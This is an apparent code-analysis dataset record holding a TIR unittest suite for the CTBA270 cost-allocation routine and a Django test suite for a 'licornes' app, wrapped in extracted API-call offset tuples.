'(x, [-1])\n', (11071, 11080), True, 'import tensorflow as tf\n'), ((11170, 11225), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Discriminator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Discriminator', reuse=tf.AUTO_REUSE)\n", (11187, 11225), True, 'import tensorflow as tf\n'), ((11860, 11878), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (11870, 11878), True, 'import tensorflow as tf\n'), ((11896, 11925), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['output', '[1, 2]'], {}), '(output, [1, 2])\n', (11909, 11925), True, 'import tensorflow as tf\n'), ((12038, 12062), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1]'], {}), '(output, [-1])\n', (12048, 12062), True, 'import tensorflow as tf\n'), ((12158, 12207), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Encoder"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Encoder', reuse=tf.AUTO_REUSE)\n", (12175, 12207), True, 'import tensorflow as tf\n'), ((12358, 12371), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (12368, 12371), True, 'import tensorflow as tf\n'), ((12524, 12537), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (12534, 12537), True, 'import tensorflow as tf\n'), ((12690, 12703), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (12700, 12703), True, 'import tensorflow as tf\n'), ((12856, 12869), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (12866, 12869), True, 'import tensorflow as tf\n'), ((13022, 13035), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (13032, 13035), True, 'import tensorflow as tf\n'), ((13049, 13089), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 8 * net_dim]'], {}), '(x, [-1, 4 * 4 * 8 * net_dim])\n', (13059, 13089), True, 'import tensorflow as tf\n'), ((13296, 13345), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Encoder"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Encoder', reuse=tf.AUTO_REUSE)\n", (13313, 13345), True, 'import tensorflow as tf\n'), ((13800, 13818), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (13810, 13818), True, 'import tensorflow as tf\n'), ((13836, 13865), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['output', '[1, 2]'], {}), '(output, [1, 2])\n', (13849, 13865), True, 'import tensorflow as tf\n'), ((4885, 4903), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (4895, 4903), True, 'import tensorflow as tf\n'), ((8610, 8628), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (8620, 8628), True, 'import tensorflow as tf\n')]
|
from tir import Webapp
import unittest
class CTBA270(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup("SIGACTB", "29/06/2015", "T1", "M SP 02 ", "34")
inst.oHelper.Program("CTBA270")
###########################################################################################
# Caso de teste 001 - Incluir Rateio #
# 29/08/2019 #
###########################################################################################
def test_CTBA270_001(self):
self.oHelper.SetButton("Incluir")
self.oHelper.SetBranch("M SP 02")
self.oHelper.SetValue("Codigo Rateio", "CTLR02")
self.oHelper.SetValue("Descricao", "Rateio Incluido")
self.oHelper.SetValue("Tipo", "1 - Movimento Mes")
#self.oHelper.SetValue("Perc. Base","100,00")
self.oHelper.SetValue("Ctq_CtOri", "11101001", name_attr=True)
self.oHelper.SetValue("cCtq_CtPar", "11101001", name_attr=True)
self.oHelper.SetValue("cCtq_CCOri", "01101", name_attr=True)
self.oHelper.SetValue("cCtq_CCPar", "01101", name_attr=True)
self.oHelper.LoadGrid()
self.oHelper.SetValue("CTQ_CTCPAR", "1110100101", grid=True, row=1)
self.oHelper.SetValue("CTQ_CCCPAR", "0110101", grid=True, row=1)
self.oHelper.SetValue("CTQ_VALOR", "80,00", grid=True, row=1)
self.oHelper.LoadGrid()
self.oHelper.SetKey("Down", grid=True)
#self.oHelper.SetFocus("CTQ_CTCPAR", grid_cell=True,row_number=2)
self.oHelper.LoadGrid()
self.oHelper.SetValue("CTQ_CTCPAR", "1110100102", grid=True, row=2)
self.oHelper.SetValue("CTQ_CCCPAR", "0110102", grid=True, row=2)
self.oHelper.SetValue("CTQ_VALOR", "20,00", grid=True, row=2)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Cancelar")
self.oHelper.AssertTrue()
###########################################################################################
# Caso de teste 002 - Alteração de centro de custo #
# 29/08/2019 #
###########################################################################################
def test_CTBA270_002(self):
self.oHelper.SetButton("Outras Ações", "Legenda")
self.oHelper.WaitShow("Desbloqueado e Indice atualizado")
self.oHelper.SetButton("Fechar")
self.oHelper.SetButton("Outras Ações", "Log Proc")
self.oHelper.SetButton("Detalhes")
self.oHelper.SetButton("Confirmar")
self.oHelper.SetButton("Sair")
self.oHelper.AssertTrue()
###########################################################################################
# Caso de teste 003 - Alteração de centro de custo #
# 29/08/2019 #
###########################################################################################
def test_CTBA270_003(self):
self.oHelper.AddParameter("MV_CTBHRAT","","1")
self.oHelper.SetParameters()
self.oHelper.SearchBrowse("D MG 01 TR0003")
self.oHelper.SetButton("Alterar")
self.oHelper.WaitShow("Rateios Off-Line - ALTERAR")
self.oHelper.SetValue("CTQ_CCCPAR", "CCCTB270A", grid=True, row=1)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Visualizar")
self.oHelper.CheckResult("cCtq_Rateio", "TR0003", name_attr=True)
self.oHelper.CheckResult("cCtq_Tipo", "1 - Movimento Mes", name_attr=True)
self.oHelper.CheckResult("cCtq_CtOri", "OCTBA27001", name_attr=True)
self.oHelper.CheckResult("cCtq_CtPar", "PCTBA27001", name_attr=True)
self.oHelper.CheckResult("CTQ_CCCPAR", "CCCTB270A", grid=True, line=1)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Confirmar")
self.oHelper.RestoreParameters()
self.oHelper.AssertTrue()
###########################################################################################
# Caso de teste 004 - #Inclusão de rateio com parametro MV_REDUZID = 1 passando no #
# campo CTQ_CCPAR ( 2 VEZES)Alteração de centro de custo #
# https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T43763 #
# #
###########################################################################################
def test_CTBA270_004(self):
self.oHelper.AddParameter("MV_REDUZID","","S")
self.oHelper.AddParameter("MV_CTBCACH","","1")
self.oHelper.SetParameters()
self.oHelper.SetButton("Incluir")
self.oHelper.SetBranch("M SP 02")
self.oHelper.SetValue("Codigo Rateio", "CTB279")
self.oHelper.SetValue("Descricao", "CTB270_REDUZIDO")
self.oHelper.SetValue("Tipo", "1 - Movimento Mes")
self.oHelper.SetValue("Perc. Base","100,00")
self.oHelper.SetValue("Ctq_CtOri", "203010100", name_attr=True)
#self.oHelper.LoadGrid()
self.oHelper.SetValue("CTQ_CTCPAR", "203010100", grid=True, row=1)
self.oHelper.SetValue("CTQ_VALOR", "101,34", grid=True, row=1)
self.oHelper.LoadGrid()
self.oHelper.SetValue("CTQ_CTCPAR", "203010100", grid=True, row=1)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Cancelar")
self.oHelper.RestoreParameters()
self.oHelper.AssertTrue()
###############################################################################################
# Caso de teste 005 - #Inclusão de rateio com parametro MV_REDUZID = 1 MV_CTBCASH = 1 #
# Digitando o código reduzido #
# https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T43827 #
# #
# #
###############################################################################################
def test_CTBA270_005(self):
self.oHelper.AddParameter("MV_REDUZID","","S")
self.oHelper.AddParameter("MV_CTBCACH","","1")
self.oHelper.SetParameters()
self.oHelper.SetButton("Incluir")
self.oHelper.SetBranch("M SP 02")
self.oHelper.SetValue("Codigo Rateio", "CTB271")
self.oHelper.SetValue("Descricao", "CTB271_REDUZIDO")
self.oHelper.SetValue("Tipo", "1 - Movimento Mes")
self.oHelper.SetValue("Perc. Base","100,00")
self.oHelper.SetValue("Ctq_CtOri", "203010100", name_attr=True)
self.oHelper.LoadGrid()
self.oHelper.SetValue("CTQ_CTCPAR", "203010100", grid=True, row=1)
self.oHelper.SetValue("CTQ_VALOR", "200,34", grid=True, row=1)
self.oHelper.LoadGrid()
#self.oHelper.SetKey("Down", grid=True)
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Cancelar")
self.oHelper.RestoreParameters()
self.oHelper.AssertTrue()
###############################################################################################
# Caso de teste 006 - #Inclusão de rateio com centro de custo obrigatório #
# Não inserindo o Centro de custo antes do alerta #
# https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/171512 #
# #
###############################################################################################
def test_CTBA270_006(self):
self.oHelper.SetButton("Incluir")
self.oHelper.SetBranch("D MG 01 ")
#Cabeçalho
self.oHelper.SetValue("Codigo Rateio", "R23883")
self.oHelper.SetValue("Descricao", "CTA CC OBRIGAT")
self.oHelper.SetValue("Tipo", "1 - Movimento Mes")
self.oHelper.SetValue("Perc. Base","100,00")
#Origem
self.oHelper.SetValue("Ctq_CtOri", "CTBA28150002", name_attr=True)
#Partida
self.oHelper.SetValue("cCtq_CtPar", "CTBA28130002", name_attr=True)
#Contra partida
self.oHelper.SetValue("CTQ_CTCPAR", "CTBA28130001", grid=True, row=1)
self.oHelper.SetValue("CTQ_VALOR", "100,00", grid=True, row=1)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Salvar")
#Tela de alerta
self.oHelper.SetButton("Não")
#Correção dos campos não preenchidos
#Origem
self.oHelper.SetValue("cCtq_CCOri", "CTB270501", name_attr=True)
#Partida
self.oHelper.SetValue("cCtq_CCPar", "CTB270302", name_attr=True)
#Contra partida
self.oHelper.SetValue("CTQ_CCCPAR", "CTB270301", grid=True, row=1)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Salvar")
#Ao salvar, a rotina abre novamente a tela de inclusão
self.oHelper.SetButton("Cancelar")
#Conferencia de resultados
#Posicionar no rateio incluído
#Filial+Cod Rateio
self.oHelper.SearchBrowse("D MG 01 R23883")
self.oHelper.SetButton("Visualizar")
#Cabeçalho
self.oHelper.CheckResult("Codigo Rateio", "R23883")
#Origem
self.oHelper.CheckResult("Ctq_CtOri", "CTBA28150002", name_attr=True)
self.oHelper.CheckResult("cCtq_CCOri", "CTB270501", name_attr=True)
#Partida
self.oHelper.CheckResult("cCtq_CtPar", "CTBA28130002", name_attr=True)
self.oHelper.CheckResult("cCtq_CCPar", "CTB270302", name_attr=True)
#Contra partida
self.oHelper.CheckResult("CTQ_CTCPAR", "CTBA28130001", grid=True, line=1)
self.oHelper.CheckResult("CTQ_CCCPAR", "CTB270301", grid=True, line=1)
self.oHelper.CheckResult("CTQ_VALOR", "100,00", grid=True, line=1)
self.oHelper.LoadGrid()
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"tir.Webapp"
] |
[((10846, 10861), 'unittest.main', 'unittest.main', ([], {}), '()\n', (10859, 10861), False, 'import unittest\n'), ((143, 151), 'tir.Webapp', 'Webapp', ([], {}), '()\n', (149, 151), False, 'from tir import Webapp\n')]
|
from django.test import TestCase
# Create your tests here.
from django.urls import reverse
from licornes.models import Licorne
from licornes.models import User
from licornes.models import Etape
from django.conf import settings
from bs4 import BeautifulSoup
import re
import os
class IndexViewTest(TestCase):
@classmethod
def setUpTestData(cls):
# On crée des utilisateurs et on leur attribue x licornes à chacun
number_of_creators = 2
number_of_licornes = 3
cls.total_licornes = number_of_creators * number_of_licornes
for user_id in range(number_of_creators):
User.objects.create(username=f"utilisateur {user_id}")
u = User.objects.get(username=f"utilisateur {user_id}")
for licorne_id in range(number_of_licornes):
Licorne.objects.create(
nom=f'Licorne {licorne_id} de {user_id}',
identifiant=f'{user_id}-{licorne_id}',
createur=u,
)
def test_view_url_exists_at_desired_location(self):
response = self.client.get('/licornes/')
self.assertEqual(response.status_code, 200)
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'licornes/index.html')
def test_licornes_are_present(self):
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, 200)
self.assertTrue('meslicornes' in response.context)
#self.assertTrue(response.context['meslicornes'] == True)
self.assertTrue(len(response.context['meslicornes']) == self.total_licornes)
#print(str(response.content))
self.assertTrue("Licorne 0 de 0" in str(response.content))
def test_licornes_ont_badge(self):
response = self.client.get(reverse('index'))
soup = BeautifulSoup(response.content, features="html.parser")
h2s = soup.find_all("h2")
badges_de_licornes = 0
for h2 in h2s:
if h2.span and "badge" in h2.span["class"]:
badges_de_licornes += 1
self.assertTrue(badges_de_licornes)
self.assertEqual(badges_de_licornes, self.total_licornes)
def test_titres_present(self):
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, 200)
self.assertInHTML("Mes licornes", str(response.content))
self.assertInHTML("Trajet", str(response.content))
def test_bouton_ajouter_present(self):
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, 200)
self.assertTrue("+ Ajouter une licorne" in str(response.content))
def test_div_map_present(self):
response = self.client.get(reverse('index'))
soup = BeautifulSoup(response.content, features="html.parser")
divs = soup.find_all("div")
div_map_in_divs = False
for d in divs:
if d.has_attr("id") and d["id"] == "map":
div_map_in_divs = True
self.assertTrue(div_map_in_divs)
def test_liens_vers_licornes_presents(self):
response = self.client.get(reverse('index'))
soup = BeautifulSoup(response.content, features="html.parser")
a = soup.find_all("a")
lien_vers_1_dans_liens = False
for l in a:
if "licorne/1" in l["href"]:
lien_vers_1_dans_liens = True
break
self.assertTrue(lien_vers_1_dans_liens)
def test_aucune_licorne_nest_active(self):
response = self.client.get(reverse('index'))
soup = BeautifulSoup(response.content, features="html.parser")
a = soup.find_all("a")
active_in_a_class = 0
for l in a:
if l.has_attr("class"):
classes = l["class"]
if "active" in classes:
active_in_a_class += 1
self.assertFalse(active_in_a_class)
def test_pas_de_polyline(self):
response = self.client.get(reverse('index'))
self.assertFalse("google.maps.Polyline" in str(response.content))
class AddViewTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.identifiant_existant = "777"
cls.identifiant_inexistant = "666"
User.objects.create(username=f"kuala")
u = User.objects.get(username=f"kuala")
Licorne.objects.create(
nom=f'Licorne de {u}',
identifiant=f'{cls.identifiant_existant}',
createur=u,
)
cls.u = u
cls.l = Licorne.objects.get(identifiant=cls.identifiant_existant)
def test_view_url_exists_at_desired_location(self):
response = self.client.get('/licornes/add/')
self.assertEqual(response.status_code, 200)
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('add'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('add'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'licornes/licorne_form.html')
def test_view_titre(self):
response = self.client.get(reverse('add'))
self.assertEqual(response.status_code, 200)
self.assertTrue("Ajouter une licorne" in str(response.content))
def test_view_fields_presents(self):
response = self.client.get(reverse('add'))
self.assertEqual(response.status_code, 200)
self.assertTrue("Nom" in str(response.content))
self.assertTrue("Identifiant" in str(response.content))
self.assertFalse("Photo" in str(response.content))
self.assertTrue("Image" in str(response.content))
self.assertFalse("+ Ajouter une licorne" in str(response.content))
def test_redirects_to_etape_on_success(self):
#response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
#self.assertEqual(response.status_code, 200)
with open(os.path.join("licornes/tests", "image-test.jpg"), "rb") as i:
response = self.client.post(reverse('add'), {"nom": "Bouou", "identifiant": self.identifiant_inexistant, "createur": self.u.id, "image": i})
self.assertRedirects(response, reverse('etape', args=[self.identifiant_inexistant]))
def test_nom_ne_peut_pas_etre_vide(self):
response = self.client.post(reverse('add'), {"nom": "", "identifiant": self.identifiant_inexistant, "createur": self.u.id})
self.assertEqual(response.status_code, 200)
self.assertFormError(response, 'form', 'nom', 'Ce champ est obligatoire.')
def test_identifiant_ne_peut_pas_etre_vide(self):
response = self.client.post(reverse('add'), {"nom": "UIOU", "identifiant": "", "createur": self.u.id})
self.assertEqual(response.status_code, 200)
self.assertFormError(response, 'form', 'identifiant', 'Ce champ est obligatoire.')
def test_champ_image_peut_etre_vide(self):
response = self.client.post(reverse('add'), {"nom": "Bouou", "identifiant": self.identifiant_inexistant, "createur": self.u.id, "image": ""})
self.assertRedirects(response, reverse('etape', args=[self.identifiant_inexistant]))
def test_champ_image_doit_etre_une_image(self):
with open(os.path.join("licornes/tests", "spam.txt"), "r") as i:
response = self.client.post(reverse('add'), {"nom": "Bouou", "identifiant": self.identifiant_inexistant, "createur": self.u.id, "image": i})
self.assertEqual(response.status_code, 200)
self.assertFormError(response, 'form', 'image', "Téléversez une image valide. Le fichier que vous avez transféré n'est pas une image ou bien est corrompu.")
class EtapeViewTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.identifiant_existant = "777"
cls.identifiant_inexistant = "666"
User.objects.create(username=f"kuala")
u = User.objects.get(username=f"kuala")
Licorne.objects.create(
nom=f'Licorne de {u}',
identifiant=f'{cls.identifiant_existant}',
createur=u,
)
cls.u = u
cls.l = Licorne.objects.get(identifiant=cls.identifiant_existant)
# On ne peut plus utiliser la version sans argument
def test_view_url_returns_404_if_no_licorne(self):
response = self.client.get('/licornes/etape/')
self.assertEqual(response.status_code, 404)
def test_view_url_by_name_404_if_no_licorne(self):
response = self.client.get(reverse('etape'))
self.assertEqual(response.status_code, 404)
# Version avec argument
def test_view_url_exists_at_desired_location(self):
response = self.client.get('/licornes/etape/%s/' % (self.identifiant_existant))
self.assertEqual(response.status_code, 200)
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'licornes/etape_form.html')
def test_view_titre(self):
licorne = Licorne.objects.get(identifiant=self.identifiant_existant)
response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
self.assertEqual(response.status_code, 200)
soup = BeautifulSoup(response.content, features="html.parser")
h1 = soup.h1.string
self.assertEqual(h1, "Ajouter une étape pour %s" % (licorne))
def test_view_fields_presents(self):
response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
self.assertEqual(response.status_code, 200)
soup = BeautifulSoup(response.content, features="html.parser")
lbls = soup.find_all("label")
labels = []
for l in lbls:
labels.append(l["for"])
self.assertTrue("id_localisation" in labels)
self.assertFalse("id_current" in labels)
self.assertTrue("id_auteur" in labels)
self.assertTrue("id_media" in labels)
# Champ input hidden pour la licorne
inputs = soup.find_all("input")
licorne_in_hidden_field = False
for i in inputs:
if i["type"] == "hidden" and i["name"] == "licorne":
licorne_in_hidden_field = True
break
self.assertTrue(licorne_in_hidden_field)
def test_view_autocomplete_present(self):
response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
self.assertEqual(response.status_code, 200)
soup = BeautifulSoup(response.content, features="html.parser")
scripts = soup.find_all("script")
autocomplete_in_src = False
#print(scripts)
for s in scripts:
if s.has_attr("src"):
src = s["src"]
if "autocomplete.js" in src:
autocomplete_in_src = True
#autocomplete_in_src = True
self.assertTrue(autocomplete_in_src)
def test_view_creer_si_inexistante(self):
# Si l'identifiant de licorne fourni ne correspond pas à une licorne
# existante, on propose de la créer
response = self.client.get(reverse('etape', args=[self.identifiant_inexistant]))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'licornes/creer.html')
soup = BeautifulSoup(response.content, features="html.parser")
t = soup.title
self.assertTrue("J'irai où tu iras" in t)
h1 = soup.h1.string
self.assertTrue("Licorne inexistante" in h1)
a = soup.find_all("a")
add_in_href = False
for l in a:
if "/add" in l["href"]:
add_in_href = True
self.assertTrue(add_in_href)
self.assertTrue(f"{self.identifiant_inexistant}" in str(response.content))
def test_form_etape_valeur_initiale_licorne(self):
response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
self.assertEqual(response.status_code, 200)
licorne = Licorne.objects.get(identifiant=self.identifiant_existant)
self.assertEqual(response.context['form'].initial['licorne'], licorne)
def test_redirects_to_index_on_success(self):
#response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
#self.assertEqual(response.status_code, 200)
response = self.client.post(reverse('etape', args=[self.l.identifiant]), {"localisation": "Pau, France", "auteur": self.u.id, "media": "Tagalok", "licorne": self.l.id})
self.assertRedirects(response, reverse('index'))
def test_form_invalid_licorne(self):
wrong_id = 78787897873
response = self.client.post(reverse('etape', args=[self.l.identifiant]), {"localisation": "Pau, France", "auteur": self.u.id, "media": "Tagalok", "licorne": wrong_id})
self.assertEqual(response.status_code, 200)
self.assertFormError(response, 'form', 'licorne', 'Sélectionnez un choix valide. Ce choix ne fait pas partie de ceux disponibles.')
def test_form_invalid_localisation(self):
response = self.client.post(reverse('etape', args=[self.l.identifiant]), {"localisation": "", "auteur": self.u.id, "media": "Tagalok", "licorne": self.l.id})
self.assertEqual(response.status_code, 200)
self.assertFormError(response, 'form', 'localisation', 'Ce champ est obligatoire.')
def test_form_invalid_auteur(self):
wrong_id = 78787897873
response = self.client.post(reverse('etape', args=[self.l.identifiant]), {"localisation": "Pau, France", "auteur": wrong_id, "media": "Tagalok", "licorne": self.l.id})
self.assertEqual(response.status_code, 200)
self.assertFormError(response, 'form', 'auteur', 'Sélectionnez un choix valide. Ce choix ne fait pas partie de ceux disponibles.')
# def test_form_invalid_renewal_date_future(self):
# login = self.client.login(username='testuser2', password='<PASSWORD>')
# invalid_date_in_future = datetime.date.today() + datetime.timedelta(weeks=5)
# response = self.client.post(reverse('renew-book-librarian', kwargs={'pk': self.test_bookinstance1.pk}), {'renewal_date': invalid_date_in_future})
# self.assertEqual(response.status_code, 200)
# self.assertFormError(response, 'form', 'renewal_date', 'Invalid date - renewal more than 4 weeks ahead')
class LicorneViewTest(TestCase):
@classmethod
def setUpTestData(cls):
# On crée des utilisateurs et on leur attribue x licornes à chacun
number_of_creators = 2
number_of_licornes = 3
cls.total_licornes = number_of_creators * number_of_licornes
cls.licornes_de_test = []
for user_id in range(number_of_creators):
User.objects.create(username=f"utilisateur {user_id}")
u = User.objects.get(username=f"utilisateur {user_id}")
for licorne_id in range(number_of_licornes):
Licorne.objects.create(
nom=f'Licorne {licorne_id} de {user_id}',
identifiant=f'{user_id}-{licorne_id}',
createur=u,
image=f'{licorne_id}.png',
)
cls.licornes_de_test.append(Licorne.objects.latest("id"))
def test_view_url_exists_at_desired_location(self):
id_lic = self.licornes_de_test[3].id
response = self.client.get(f'/licornes/licorne/{id_lic}/')
self.assertEqual(response.status_code, 200)
def test_view_url_redirected_if_no_trailing_slash(self):
id_lic = self.licornes_de_test[3].id
response = self.client.get(f'/licornes/licorne/{id_lic}')
self.assertEqual(response.status_code, 301)
def test_view_url_accessible_by_name(self):
id_lic = self.licornes_de_test[3].id
response = self.client.get(reverse('licorne', args=[id_lic]))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
id_lic = self.licornes_de_test[3].id
response = self.client.get(reverse('licorne', args=[id_lic]))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'licornes/licorne.html')
def test_licornes_are_present(self):
id_lic = self.licornes_de_test[3].id
response = self.client.get(reverse('licorne', args=[id_lic]))
self.assertEqual(response.status_code, 200)
self.assertTrue('meslicornes' in response.context)
#self.assertTrue(response.context['meslicornes'] == True)
self.assertTrue(len(response.context['meslicornes']) == self.total_licornes)
#print(str(response.content))
self.assertTrue("Licorne 0 de 0" in str(response.content))
def test_titres_present(self):
id_lic = self.licornes_de_test[3].id
response = self.client.get(reverse('licorne', args=[id_lic]))
self.assertEqual(response.status_code, 200)
self.assertTrue("Mes licornes" in str(response.content))
self.assertInHTML("Trajet", str(response.content))
def test_bouton_ajouter_present(self):
id_lic = self.licornes_de_test[3].id
response = self.client.get(reverse('licorne', args=[id_lic]))
self.assertEqual(response.status_code, 200)
self.assertTrue("+ Ajouter une licorne" in str(response.content))
def test_div_map_present(self):
id_lic = self.licornes_de_test[3].id
response = self.client.get(reverse('licorne', args=[id_lic]))
soup = BeautifulSoup(response.content, features="html.parser")
divs = soup.find_all("div")
div_map_in_divs = False
for d in divs:
if d.has_attr("id") and d["id"] == "map":
div_map_in_divs = True
self.assertTrue(div_map_in_divs)
def test_liens_vers_licornes_presents(self):
id_lic = self.licornes_de_test[3].id
response = self.client.get(reverse('licorne', args=[id_lic]))
soup = BeautifulSoup(response.content, features="html.parser")
a = soup.find_all("a")
lien_vers_1_dans_liens = False
for l in a:
if "licorne/1" in l["href"]:
lien_vers_1_dans_liens = True
break
self.assertTrue(lien_vers_1_dans_liens)
def test_une_licorne_est_active(self):
id_lic = self.licornes_de_test[3].id
response = self.client.get(reverse('licorne', args=[id_lic]))
soup = BeautifulSoup(response.content, features="html.parser")
a = soup.find_all("a")
active_in_a_class = 0
for l in a:
if l.has_attr("class"):
classes = l["class"]
if "active" in classes:
active_in_a_class += 1
self.assertTrue(active_in_a_class)
self.assertEqual(active_in_a_class, 1)
def test_licornes_ont_badge(self):
response = self.client.get(reverse('index'))
soup = BeautifulSoup(response.content, features="html.parser")
h2s = soup.find_all("h2")
badges_de_licornes = 0
for h2 in h2s:
if h2.span and "badge" in h2.span["class"]:
badges_de_licornes += 1
self.assertTrue(badges_de_licornes)
self.assertEqual(badges_de_licornes, self.total_licornes)
def test_licornes_ont_image(self):
response = self.client.get(reverse('index'))
soup = BeautifulSoup(response.content, features="html.parser")
lics = soup.find_all(attrs={"class": "list-group-item"})
lic_img = 0
bons_noms_dimages = 0
for l in lics:
numero = re.sub("Licorne ([0-9]+).*", "\\1", l.h2.text, re.M)[0:4].strip()
if l.img:
lic_img += 1
if os.path.basename(l.img["src"]) == f'{numero}.png':
bons_noms_dimages += 1
self.assertTrue(lic_img)
self.assertTrue(bons_noms_dimages)
self.assertEqual(lic_img, len(lics))
self.assertEqual(bons_noms_dimages, len(lics))
class MediaViewTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.identifiant_existant = "777"
cls.identifiant_inexistant = "666"
User.objects.create(username=f"kuala")
u = User.objects.get(username=f"kuala")
Licorne.objects.create(
nom=f'Licorne de {u}',
identifiant=f'{cls.identifiant_existant}',
createur=u,
)
l = Licorne.objects.get(nom=f'Licorne de {u}')
e0 = Etape.objects.create(licorne=l, auteur=u, localisation="Paris, France")
e0.save()
e1 = Etape.objects.create(licorne=l, auteur=u, localisation="Berlin, Allemagne")
e1.save()
e2 = Etape.objects.create(licorne=l, auteur=u, localisation="San Francisco")
e2.save()
# Version avec argument
def test_view_url_exists_at_desired_location(self):
e1 = Etape.objects.get(localisation="Berlin, Allemagne")
u = '/licornes/media/%s/' % (e1.id)
response = self.client.get(u)
self.assertEqual(response.status_code, 200)
def test_view_url_accessible_by_name(self):
e1 = Etape.objects.get(localisation="Berlin, Allemagne")
response = self.client.get(reverse('media', args=[e1.id]))
self.assertEqual(response.status_code, 200)
def test_404_if_nonexistant_id(self):
response = self.client.get(reverse('media', args=[11111111]))
self.assertEqual(response.status_code, 404)
|
[
"licornes.models.User.objects.create",
"licornes.models.Licorne.objects.create",
"os.path.basename",
"licornes.models.Licorne.objects.latest",
"licornes.models.Etape.objects.get",
"licornes.models.Etape.objects.create",
"licornes.models.Licorne.objects.get",
"licornes.models.User.objects.get",
"django.urls.reverse",
"bs4.BeautifulSoup",
"os.path.join",
"re.sub"
] |
[((2123, 2178), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (2136, 2178), False, 'from bs4 import BeautifulSoup\n'), ((3067, 3122), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (3080, 3122), False, 'from bs4 import BeautifulSoup\n'), ((3466, 3521), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (3479, 3521), False, 'from bs4 import BeautifulSoup\n'), ((3885, 3940), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (3898, 3940), False, 'from bs4 import BeautifulSoup\n'), ((4554, 4592), 'licornes.models.User.objects.create', 'User.objects.create', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (4573, 4592), False, 'from licornes.models import User\n'), ((4605, 4640), 'licornes.models.User.objects.get', 'User.objects.get', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (4621, 4640), False, 'from licornes.models import User\n'), ((4650, 4755), 'licornes.models.Licorne.objects.create', 'Licorne.objects.create', ([], {'nom': 'f"""Licorne de {u}"""', 'identifiant': 'f"""{cls.identifiant_existant}"""', 'createur': 'u'}), "(nom=f'Licorne de {u}', identifiant=\n f'{cls.identifiant_existant}', createur=u)\n", (4672, 4755), False, 'from licornes.models import Licorne\n'), ((4836, 4893), 'licornes.models.Licorne.objects.get', 'Licorne.objects.get', ([], {'identifiant': 'cls.identifiant_existant'}), '(identifiant=cls.identifiant_existant)\n', (4855, 4893), False, 'from licornes.models import Licorne\n'), ((8192, 8230), 'licornes.models.User.objects.create', 'User.objects.create', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (8211, 8230), False, 'from licornes.models import User\n'), ((8243, 8278), 'licornes.models.User.objects.get', 'User.objects.get', ([], {'username': 